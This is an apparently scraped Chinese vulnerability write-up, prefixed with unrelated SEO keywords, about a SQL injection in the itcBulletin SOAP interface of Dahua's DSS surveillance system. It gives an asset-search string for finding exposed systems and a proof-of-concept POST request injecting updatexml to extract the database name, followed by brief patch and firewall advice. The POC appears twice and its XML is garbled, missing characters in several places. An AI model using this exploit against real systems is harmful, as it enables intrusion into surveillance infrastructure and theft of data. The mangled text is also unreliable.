网站设计开发人员,桂林八景,平面设计师兼职网站,做百度翻译英文网站漏洞简介
大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验#xff0c;导致该接口存在SQL注入漏洞#xff0c;可通过注入漏洞获取数据库敏感信息。
资产测绘
app“dahua-DSS” 漏洞复现
POC:
POST /portal/services/itcBulletin?wsdl HTTP/1.1
H…漏洞简介
大华DSS数字监控系统itcBulletin接口对传入的数据没有预编译和充足的校验导致该接口存在SQL注入漏洞可通过注入漏洞获取数据库敏感信息。
资产测绘
app“dahua-DSS” 漏洞复现
POC:
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host:your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 341
Accept-Encoding: gzips11:Envelope xmlns:s11http://schemas.xmlsoap.org/soap/envelope/s11:Bodyns1:deleteBulletin xmlns:ns1http://itcbulletinservice.webservice.dssc.dahua.comnetMarkings(updatexml(1,concat(0x7e,(select database()),0x7e),1))) and (11/netMarkings/ns1:deleteBulletin/s11:Body
/s11:Envelope成功查询出当前数据库。
Sqlmap验证 修复建议
1.升级至应用最新版本 2.部署WAF防火墙进行防护。
